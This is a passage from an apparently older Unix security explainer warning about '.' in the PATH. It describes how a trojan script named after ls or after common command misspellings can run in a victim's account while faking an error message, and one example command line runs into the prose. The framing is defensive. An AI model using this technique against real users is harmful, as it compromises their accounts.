. anywhere in your PATH variable is a
bad idea. It is possible to break your account if you are not
careful. I will here give an outline of some of the ways in which you
could get your account compromised.
These explanations are supposed to informational in their nature
and help you to avoid problem.
You should never use your knowledge to cause
harm. Remember that breaking into an account always
causes harm, even if you do not do anything.
People feel insecure and will lose confidence in you especially, and
in computer folks in general.
If a user has placed a . in the beginning of the path, it
is possible for you to make him/her execute any command by
constructing a script or program with the same name as a common
command, e.g. ls.
The most common placement for this is to place it at the top level of
your own directory. People, especially novices, usually execute the
following sequence.
This will then execute your command instead of the system suppliedbash$ cd ~fluffy bash$ ls
ls.
This could be avoided by placing the . last in your path,
but since humans are human, they make errors.
A trivial error is to misspell a command. Hence you could create a set
of scripts (or create one script and a bunch of hard links to it) with
common misspellings of common commands. The script could then print
the same error message as the one you get when you type an illegal
command and the user would be no wiser, but have a broken account.
The fact that execution takes time, while you get the error message
pretty quick is not a problem. You could spawn a new process that
could do whatever it liked for any amount of time while the script
just prints the message and exits.